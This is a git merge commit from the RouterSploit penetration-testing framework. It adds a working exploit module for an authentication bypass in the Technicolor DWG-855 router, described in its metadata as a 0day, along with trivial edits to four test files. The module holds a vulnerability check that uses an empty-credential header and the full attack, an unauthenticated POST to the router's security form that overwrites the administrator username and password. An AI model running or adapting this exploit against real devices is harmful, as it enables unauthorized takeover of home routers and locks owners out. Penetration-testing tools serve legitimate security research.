Merge branch '0BuRner-patch-1'

3660f72d · fwkz · 2fe031c1 · 3e718929 · 3660f72d · 3660f72d
Commit 3660f72d authored Nov 16, 2016 by fwkz
5 changed files
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+    sanitize_url,
+    http_request,
+    mute,
+    validators
+)
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
+    If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters.
+    """
+    __info__ = {
+        'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
+        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
+        'authors': [
+            'JPaulMora <https://JPaulMora.GitHub.io>',
+            # vulnerability discovery,routersploit module
+        ],
+        'references': [
+            'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
+        ],
+        'devices': [
+            'Technicolor DWG-855',
+        ]
+    }
+    target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+    nuser = exploits.Option('ruser', 'New user (overwrites existing user)')
+    npass = exploits.Option('rpass', 'New password (overwrites existing password)')
+    # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
+    vulnresp = "\x11\x44\x75\x63\x6b\x79\x00"  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
+    def run(self):
+        print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
+        url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
+        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
+        data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
+        response = http_request(method="POST", url=url, headers=headers, data=data)
+        if response is None:
+            print_error("Target didn't answer request.")
+        elif self.vulnresp in response.text.encode('utf-8'):
+            print_success("Credentials changed!")
+        elif response.status_code == 401:
+            print_error("Target answered, denied access.")
+        else:
+            print_error("Unknown error, submit an issue.")
+    @mute
+    def check(self):
+        url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
+        user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
+        headers = {'User-Agent': user_agent,
+                   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+                   'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
+                   'Connection': 'keep-alive',
+                   'Accept-Encoding': 'gzip, deflate',
+                   'Authorization': 'Og==',  # this is base64(":")
+                   'Cache-Control': 'no-cache'}
+        response = http_request(method="GET", url=url, headers=headers)
+        if response is not None and self.vulnresp in response.text.encode('utf-8'):
+            return True
+        else:
+            return False
--- a/routersploit/test/test_completer.py
+++ b/routersploit/test/test_completer.py
@@ -255,5 +255,6 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
            'show options'
        )
 if __name__ == '__main__':
    unittest.main()
--- a/routersploit/test/test_interpreter.py
+++ b/routersploit/test/test_interpreter.py
@@ -621,5 +621,6 @@ class RoutersploitInterpreterTest(RoutersploitTestCase):
            ]
        )
 if __name__ == '__main__':
    unittest.main()
--- a/routersploit/test/test_utils.py
+++ b/routersploit/test/test_utils.py
@@ -52,5 +52,6 @@ class UtilsTest(RoutersploitTestCase):
            ]
        )
 if __name__ == '__main__':
    unittest.main()
--- a/routersploit/test/test_validators.py
+++ b/routersploit/test/test_validators.py
@@ -136,5 +136,6 @@ class ValidatorsTest(RoutersploitTestCase):
        value = "t"
        self.assertEqual(validators.boolify(value), True)
 if __name__ == '__main__':
    unittest.main()